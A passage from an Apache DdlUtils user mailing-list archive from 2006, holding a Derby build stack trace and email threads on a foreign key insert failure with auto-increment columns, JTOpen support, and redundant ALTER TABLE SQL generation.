auto-generated pk values [ddlToDatabase] Jun 6, 2006 3:54:38 PM org.apache.ddlutils.platform.PlatformImplBase insert [ddlToDatabase] WARNING: The database does not support querying for auto-generated pk values [ddlToDatabase] Jun 6, 2006 3:54:38 PM org.apache.ddlutils.platform.PlatformImplBase insert [ddlToDatabase] WARNING: The database does not support querying for auto-generated pk values [ddlToDatabase] Jun 6, 2006 3:54:38 PM org.apache.ddlutils.platform.PlatformImplBase insert [ddlToDatabase] WARNING: The database does not support querying for auto-generated pk values [ddlToDatabase] Jun 6, 2006 3:54:38 PM org.apache.commons.digester.Digester endElement [ddlToDatabase] SEVERE: End event threw exception [ddlToDatabase] org.apache.ddlutils.io.DataSinkException: org.apache.ddlutils.DynaSqlException: Error while inserting in to the database [ddlToDatabase] at org.apache.ddlutils.io.DataToDatabaseSink.insertSingleBeanIntoDatabase(DataToDatabaseSink.jav a:391) [ddlToDatabase] at org.apache.ddlutils.io.DataToDatabaseSink.insertBeanIntoDatabase(DataToDatabaseSink.java:330) [ddlToDatabase] at org.apache.ddlutils.io.DataToDatabaseSink.addBean(DataToDatabaseSink.java:273) [ddlToDatabase] at org.apache.ddlutils.io.DynaSqlCreateRule.end(DynaSqlCreateRule.java:79) [ddlToDatabase] at org.apache.commons.digester.Digester.endElement(Digester.java:1130) [ddlToDatabase] at org.apache.xerces.parsers.AbstractSAXParser.endElement(Unknown Source) [ddlToDatabase] at org.apache.xerces.parsers.AbstractXMLDocumentParser.emptyElement(Unknown Source) [ddlToDatabase] at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanStartElement(Unknown Source) [ddlToDatabase] at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl$FragmentContentDispatcher.dispatch(Unkn own Source) [ddlToDatabase] at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source) [ddlToDatabase] at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source) [ddlToDatabase] at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source) [ddlToDatabase] at org.apache.xerces.parsers.XMLParser.parse(Unknown Source) [ddlToDatabase] at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source) [ddlToDatabase] at org.apache.commons.digester.Digester.parse(Digester.java:1631) [ddlToDatabase] at org.apache.ddlutils.task.WriteDataToDatabaseCommand.readSingleDataFile(WriteDataToDatabaseCom mand.java:189) [ddlToDatabase] at org.apache.ddlutils.task.WriteDataToDatabaseCommand.execute(WriteDataToDatabaseCommand.java:1 33) [ddlToDatabase] at org.apache.ddlutils.task.DatabaseTaskBase.executeCommands(DatabaseTaskBase.java:198) [ddlToDatabase] at org.apache.ddlutils.task.DatabaseTaskBase.execute(DatabaseTaskBase.java:222) [ddlToDatabase] at org.apache.tools.ant.UnknownElement.execute(UnknownElement.java:275) [ddlToDatabase] at org.apache.tools.ant.Task.perform(Task.java:364) [ddlToDatabase] at org.apache.tools.ant.Target.execute(Target.java:341) [ddlToDatabase] at org.apache.tools.ant.Target.performTasks(Target.java:369) [ddlToDatabase] at org.apache.tools.ant.Project.executeTarget(Project.java:1214) [ddlToDatabase] at org.apache.tools.ant.Project.executeTargets(Project.java:1062) [ddlToDatabase] at org.apache.tools.ant.Main.runBuild(Main.java:673) [ddlToDatabase] at org.apache.tools.ant.Main.startAnt(Main.java:188) [ddlToDatabase] at org.apache.tools.ant.launch.Launcher.run(Launcher.java:196) [ddlToDatabase] at org.apache.tools.ant.launch.Launcher.main(Launcher.java:55) [ddlToDatabase] Caused by: org.apache.ddlutils.DynaSqlException: Error while inserting into the database [ddlToDatabase] at org.apache.ddlutils.platform.PlatformImplBase.insert(PlatformImplBase.java:1126) [ddlToDatabase] at org.apache.ddlutils.io.DataToDatabaseSink.insertSingleBeanIntoDatabase(DataToDatabaseSink.jav a:376) [ddlToDatabase] ... 28 more [ddlToDatabase] Caused by: SQL Exception: INSERT on table 'S_POS' caused a violation of foreign key constraint 'SQL06053 1032406571' for key (15). The statement has been rolled back. [ddlToDatabase] at org.apache.derby.impl.jdbc.Util.generateCsSQLException(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.TransactionResourceImpl.wrapInSQLException(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.TransactionResourceImpl.handleException(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.EmbedConnection.handleException(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.ConnectionChild.handleException(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.EmbedStatement.executeStatement(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.EmbedPreparedStatement.executeStatement(Unknown Source) [ddlToDatabase] at org.apache.derby.impl.jdbc.EmbedPreparedStatement.executeUpdate(Unknown Source) [ddlToDatabase] at org.apache.commons.dbcp.DelegatingPreparedStatement.executeUpdate(DelegatingPreparedStatement .java:101) [ddlToDatabase] at org.apache.ddlutils.platform.PlatformImplBase.insert(PlatformImplBase.java:1115) [ddlToDatabase] ... 29 more BUILD FAILED F:\components\ddlutils\derby_create.xml:20: Could not read data file F:\components\ddlutils\data.xml --------------080801010104070702000604-- From [email protected] Wed Jun 07 07:33:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33970 invoked from network); 7 Jun 2006 07:33:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 07:33:30 -0000 Received: (qmail 37800 invoked by uid 500); 7 Jun 2006 07:33:30 -0000 Delivered-To: [email protected] Received: (qmail 37773 invoked by uid 500); 7 Jun 2006 07:33:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37762 invoked by uid 99); 7 Jun 2006 07:33:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 00:33:29 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 00:33:29 -0700 Received: by nf-out-0910.google.com with SMTP id d4so84450nfe for <[email protected]>; Wed, 07 Jun 2006 00:33:07 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=p38XpEyU3FtuU8RB2bM7DcCZVAEnW9PQ8sqNVcX/DlHHxjW51DnojP6hVpz/DAxxowxoPWKH/3ExXcc1NuPMBJFIZMrMaXLfzysgMOdJbMzIyuVm3yZlfihX6Q155YtnwhAUqU7TobpFPLzOfKbYCy4zGvAeYZrIvQ2WYPVPX9Y= Received: by 161.129.204.104 with SMTP id f5mr192084nfh; Wed, 07 Jun 2006 00:33:07 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 7 Jun 2006 00:33:07 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 7 Jun 2006 09:33:07 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Ddlutils with JTOpen In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/4/06, Davide Grandi <[email protected]> wrote: > Mmmh ... "unified" like that ? > I'm still digging into SVN. Unified diff is a specific diff format that is produced e.g. by running "svn diff" without options. See e.g. here: http://svnbook.red-bean.com/en/1.0/svn-book.html#svn-ch-3-sect-4.3.2 > Maybe it will grow to a XyzPlatform (may be not ...). I've added the JDBC driver and subprotocol in SVN. If the rest works (i.e. same SQL syntax and no significant JDBC differences between the drivers), then a new platform should not be necessary. However, I don't have access to an AS/400, so please, if you find other differences, let me know. Tom From [email protected] Wed Jun 07 08:08:35 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45188 invoked from network); 7 Jun 2006 08:08:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 08:08:35 -0000 Received: (qmail 75707 invoked by uid 500); 7 Jun 2006 08:08:35 -0000 Delivered-To: [email protected] Received: (qmail 75695 invoked by uid 500); 7 Jun 2006 08:08:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75683 invoked by uid 99); 7 Jun 2006 08:08:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 01:08:35 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 01:08:34 -0700 Received: by nf-out-0910.google.com with SMTP id m19so92581nfc for <[email protected]>; Wed, 07 Jun 2006 01:08:13 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=S272BbQUw+6R3kiXJTnSpaI9d8LP4teAToMQ1/w55O28iKU4HLBgDj93W8WhcVW9uYYPMTmENmBvyWhCil/gxIndg5nkX8jrOiJf/mdTo4DlAubD4Zlwxad1yYKisGIuuj5mxJTexjibSxbIIzHnQWE0QNq4YcEqq6DaVCkEbRY= Received: by 161.129.204.104 with SMTP id x3mr224764nfg; Wed, 07 Jun 2006 01:08:03 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 7 Jun 2006 01:08:13 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 7 Jun 2006 10:08:13 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Foreign Key problem In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/6/06, Terry Steichen <[email protected]> wrote: > I used ddlutils to dump a schema and contents of an existing (Derby > 161.129.204.104) database, containing four tables (PERSPECTIVE, S_POS, > WIKI_PAGE and WIKI_PAGE_VERSIONS). When I try to create a new database > using the dumped schema and data, I get an exception, saying that an > insert to one of my tables (S_POS) violates the associated foreign key. > (S_POS:PERSPECTIVE_ID->PERSPECTIVE:ID). If I remove the foreign key > specification from the schema, it seems to work fine in creating a new > database. > > What's particularly puzzling is that two of my other tables are also > linked via a foreign key > (WIKI_PAGE_VERSIONS:VERSION_NAME->WIKI_PAGE:PAGE_NAME) and it works just > fine - no [email protected]. > > I have three questions: > (1) why is the first foreign key specification causing a problem? > (2) why is the second foreign key specification working fine? > (3) what is the consequence of simply removing the foreign key (and > creating the database without it)? Your model works fine for me (clean Derby 161.129.204.104 database). I think the problem lies in the fact that the original foreignkey between S_POS and PERSPECTIVE was created without a name. Thus, the database assigned one automatically (SQL060531032406571). Now, since this is an internal name, it can be that in your target database there is already an object with this name (a foreignkey, an index, ...) and thus the database complains. To remedy this, you should give the foreignkey a useful name, either in the original database (if possible) or in the generated XML: Tom From [email protected] Wed Jun 07 10:31:58 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88684 invoked from network); 7 Jun 2006 10:31:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 10:31:58 -0000 Received: (qmail 84532 invoked by uid 500); 7 Jun 2006 10:31:58 -0000 Delivered-To: [email protected] Received: (qmail 84510 invoked by uid 500); 7 Jun 2006 10:31:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84499 invoked by uid 99); 7 Jun 2006 10:31:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 03:31:57 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pyramid-03.kattare.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 03:31:54 -0700 Received: from [161.129.204.104] (ip70-187-212-165.dc.dc.cox.net [161.129.204.104]) (authenticated bits=0) by pyramid-03.kattare.com (8.13.6/8.13.6) with ESMTP id k57AVhff011031 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for <[email protected]>; Wed, 7 Jun 2006 03:31:45 -0700 Message-ID: <[email protected]> Date: Wed, 07 Jun 2006 06:31:37 -0400 From: Terry Steichen <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060308) MIME-Version: 1.0 To: [email protected] Subject: Re: Foreign Key problem References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Tom, I forgot to mention that I had thought of that, and modified the name of the foreign key to a different name. No change. Is it possible that the problem is that the target field for the foreign key (in the PERSPECTIVE table) is set for auto-increment? (I've never been sure how this would/should work anyway, because you can't insert values into an auto-increment field.) Terry PS: when you say that the model worked fine for you, I presume you mean that you could create a structure using the schema I provided. However, I think the problem (as you can see from the stacktrace) comes when you try to insert the data into that structure. Thomas Dudziak wrote: > On 6/6/06, Terry Steichen <[email protected]> wrote: > >> I used ddlutils to dump a schema and contents of an existing (Derby >> 161.129.204.104) database, containing four tables (PERSPECTIVE, S_POS, >> WIKI_PAGE and WIKI_PAGE_VERSIONS). When I try to create a new database >> using the dumped schema and data, I get an exception, saying that an >> insert to one of my tables (S_POS) violates the associated foreign key. >> (S_POS:PERSPECTIVE_ID->PERSPECTIVE:ID). If I remove the foreign key >> specification from the schema, it seems to work fine in creating a new >> database. >> >> What's particularly puzzling is that two of my other tables are also >> linked via a foreign key >> (WIKI_PAGE_VERSIONS:VERSION_NAME->WIKI_PAGE:PAGE_NAME) and it works just >> fine - no [email protected]. >> >> I have three questions: >> (1) why is the first foreign key specification causing a problem? >> (2) why is the second foreign key specification working fine? >> (3) what is the consequence of simply removing the foreign key (and >> creating the database without it)? > > Your model works fine for me (clean Derby 161.129.204.104 database). > I think the problem lies in the fact that the original foreignkey > between S_POS and PERSPECTIVE was created without a name. Thus, the > database assigned one automatically (SQL060531032406571). Now, since > this is an internal name, it can be that in your target database there > is already an object with this name (a foreignkey, an index, ...) and > thus the database complains. > To remedy this, you should give the foreignkey a useful name, either > in the original database (if possible) or in the generated XML: > > Tom > From [email protected] Wed Jun 07 13:08:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39719 invoked from network); 7 Jun 2006 13:08:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 13:08:56 -0000 Received: (qmail 86153 invoked by uid 500); 7 Jun 2006 13:08:53 -0000 Delivered-To: [email protected] Received: (qmail 86064 invoked by uid 500); 7 Jun 2006 13:08:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86015 invoked by uid 99); 7 Jun 2006 13:08:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:08:53 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:08:52 -0700 Received: by nf-out-0910.google.com with SMTP id h2so133491nfe for <[email protected]>; Wed, 07 Jun 2006 06:08:31 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=RLar3U8snP5g0HwlaipBEvnGKrn+UQMnbbleqK5LUtxEpD+QMp4nmqtPIuTkX2WQsTY6onS8vHs5K9wGfu/0uLe1lcUEZfLAtBq74Wia/tWazJrS1kclMNlHrTzyttPKQygDDsKTkizxUQK5W+BlvjPcmX4Xdfele2v7Q5rLi5E= Received: by 161.129.204.104 with SMTP id l11mr429103nfg; Wed, 07 Jun 2006 06:08:31 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 7 Jun 2006 06:08:31 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 7 Jun 2006 15:08:31 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Foreign Key problem In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/7/06, Terry Steichen <[email protected]> wrote: > I forgot to mention that I had thought of that, and modified the name of > the foreign key to a different name. No change. > > Is it possible that the problem is that the target field for the foreign > key (in the PERSPECTIVE table) is set for auto-increment? (I've never > been sure how this would/should work anyway, because you can't insert > values into an auto-increment field.) Well, that is not exactly true: you can insert into an auto-increment field if the auto-increment is specified to allow this. For Derby, this can be done via the "generate by default as identity" column constraint (which is the one that DdlUtils uses). Though you'll likely have problems later on because the identity value generator does not pick up your inserted values, so it is likely that it spits out values that you've inserted manually before. > PS: when you say that the model worked fine for you, I presume you mean > that you could create a structure using the schema I provided. However, > I think the problem (as you can see from the stacktrace) comes when you > try to insert the data into that structure. Yes, you're right, my mistake. The stacktrace says that the key "15" is inserted twice, perhaps the data that you insert is wrong ? Tom From [email protected] Wed Jun 07 13:14:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41810 invoked from network); 7 Jun 2006 13:14:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2006 13:14:29 -0000 Received: (qmail 3460 invoked by uid 500); 7 Jun 2006 13:14:29 -0000 Delivered-To: [email protected] Received: (qmail 3433 invoked by uid 500); 7 Jun 2006 13:14:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3422 invoked by uid 99); 7 Jun 2006 13:14:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:14:28 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pyramid-03.kattare.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Jun 2006 06:14:28 -0700 Received: from [161.129.204.104] (ip70-187-212-165.dc.dc.cox.net [161.129.204.104]) (authenticated bits=0) by pyramid-03.kattare.com (8.13.6/8.13.6) with ESMTP id k57DECk1032170 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for <[email protected]>; Wed, 7 Jun 2006 06:14:13 -0700 Message-ID: <[email protected]> Date: Wed, 07 Jun 2006 09:14:10 -0400 From: Terry Steichen <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20060308) MIME-Version: 1.0 To: [email protected] Subject: Re: Foreign Key problem References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Sorry to respond to my own post, but the problem was (is?) indeed that the target of the foreign key was an auto-increment field. When I altered the schema to set that field's autoincrement attribute to "false", the new database was created and the data loaded fine. This leads to the question: how to make the created database function the way the original one did, that is, with the field in question operating in an auto-increment mode? Can/should I do this after creation with an alter column operation? Even if that works, it seems pretty awkward. (At a minimum, this apparent limitation to the use of ddlutils should probably be documented somewhere.) Terry Steichen wrote: > Tom, > > I forgot to mention that I had thought of that, and modified the name > of the foreign key to a different name. No change. > > Is it possible that the problem is that the target field for the > foreign key (in the PERSPECTIVE table) is set for auto-increment? > (I've never been sure how this would/should work anyway, because you > can't insert values into an auto-increment field.) > > Terry > > PS: when you say that the model worked fine for you, I presume you > mean that you could create a structure using the schema I provided. > However, I think the problem (as you can see from the stacktrace) > comes when you try to insert the data into that structure. > > Thomas Dudziak wrote: >> On 6/6/06, Terry Steichen <[email protected]> wrote: >> >>> I used ddlutils to dump a schema and contents of an existing (Derby >>> 161.129.204.104) database, containing four tables (PERSPECTIVE, S_POS, >>> WIKI_PAGE and WIKI_PAGE_VERSIONS). When I try to create a new database >>> using the dumped schema and data, I get an exception, saying that an >>> insert to one of my tables (S_POS) violates the associated foreign key. >>> (S_POS:PERSPECTIVE_ID->PERSPECTIVE:ID). If I remove the foreign key >>> specification from the schema, it seems to work fine in creating a new >>> database. >>> >>> What's particularly puzzling is that two of my other tables are also >>> linked via a foreign key >>> (WIKI_PAGE_VERSIONS:VERSION_NAME->WIKI_PAGE:PAGE_NAME) and it works >>> just >>> fine - no [email protected]. >>> >>> I have three questions: >>> (1) why is the first foreign key specification causing a problem? >>> (2) why is the second foreign key specification working fine? >>> (3) what is the consequence of simply removing the foreign key (and >>> creating the database without it)? >> >> Your model works fine for me (clean Derby 161.129.204.104 database). >> I think the problem lies in the fact that the original foreignkey >> between S_POS and PERSPECTIVE was created without a name. Thus, the >> database assigned one automatically (SQL060531032406571). Now, since >> this is an internal name, it can be that in your target database there >> is already an object with this name (a foreignkey, an index, ...) and >> thus the database complains. >> To remedy this, you should give the foreignkey a useful name, either >> in the original database (if possible) or in the generated XML: >> >> Tom >> > From [email protected] Wed Jun 14 13:03:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63270 invoked from network); 14 Jun 2006 13:03:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 13:03:30 -0000 Received: (qmail 81390 invoked by uid 500); 14 Jun 2006 13:03:28 -0000 Delivered-To: [email protected] Received: (qmail 81318 invoked by uid 500); 14 Jun 2006 13:03:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81267 invoked by uid 99); 14 Jun 2006 13:03:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 06:03:28 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=HTML_MESSAGE,SPF_PASS,UPPERCASE_50_75 X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp3.matrix.com.br) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 06:03:27 -0700 Received: from portalbl1.matrix.net.br (unknown [161.129.204.104]) by smtp3.matrix.com.br (Postfix) with SMTP id D17B317F5FC for <[email protected]>; Wed, 14 Jun 2006 08:18:21 -0300 (BRT) Received: (qmail 27692 invoked from network); 14 Jun 2006 13:02:31 -0000 Received: from unknown (HELO is1) ([email protected]@[161.129.204.104]) (envelope-sender <[email protected]>) by portalbl1.matrix.net.br (qmail-ldap-1.03) with SMTP for <[email protected]>; 14 Jun 2006 13:02:31 -0000 Message-ID: <003601c68fb2$cbc60220$0207a8c0@is1> From: "Douglas Granzotto (Infoarte)" <[email protected]> To: <[email protected]> Subject: Plataform.getAlterTablesSql results Date: Wed, 14 Jun 2006 10:02:30 -0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0033_01C68F99.A61BDD10" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0033_01C68F99.A61BDD10 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I am using the following method: String getAlterTablesSql(Database desiredDb, boolean doDrops, boolean = modifyColumns, boolean continueOnError) from Plataform It is returning this sql code: ALTER TABLE IPI ADD CLASSFISCAL VARCHAR(12); ALTER TABLE IPI ALTER CLASSFISCAL POSITION 4; CREATE TABLE IPI_ ( IPICOD VARCHAR(2) NOT NULL, IPIDESC VARCHAR(30), TIPO INTEGER, CLASSFISCAL VARCHAR(12), VERSAO INTEGER, PRIMARY KEY (IPICOD) ); INSERT INTO IPI_ (CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO) SELECT = CLASSFISCAL,IPICOD,IPIDESC,TIPO,VERSAO FROM IPI; DROP TABLE IPI; CREATE TABLE IPI ( IPICOD VARCHAR(2) NOT NULL, IPIDESC VARCHAR(30), TIPO INTEGER, CLASSFISCAL VARCHAR(12), VERSAO INTEGER, PRIMARY KEY (IPICOD) ); CREATE INDEX IX_IPI_1 ON IPI (IPIDESC); INSERT INTO IPI (IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO) SELECT = IPICOD,IPIDESC,TIPO,CLASSFISCAL,VERSAO FROM IPI_; DROP TABLE IPI_; I believe that it would be necessary, only this: ALTER TABLE IPI ADD CLASSFISCAL VARCHAR(12); ALTER TABLE IPI ALTER CLASSFISCAL POSITION 4; Since I only added a column. I don't understand, why of the remaining of the code. CREATE TABLE IPI_, INSERT INTO IPI_,=20 DROP TABLE IPI, etc Thanks, Douglas Granzotto ------=_NextPart_000_0033_01C68F99.A61BDD10-- From [email protected] Wed Jun 14 14:03:22 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54798 invoked from network); 14 Jun 2006 14:03:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 14:03:22 -0000 Received: (qmail 50395 invoked by uid 500); 14 Jun 2006 14:03:21 -0000 Delivered-To: [email protected] Received: (qmail 50371 invoked by uid 500); 14 Jun 2006 14:03:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50360 invoked by uid 99); 14 Jun 2006 14:03:21 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 07:03:21 -0700 X-ASF-Spam-Status: No, hits=2.6 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS,UPPERCASE_50_75 X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 07:03:20 -0700 Received: by ug-out-1314.google.com with SMTP id m3so332344uge for <[email protected]>; Wed, 14 Jun 2006 07:02:58 -0700 (PDT) 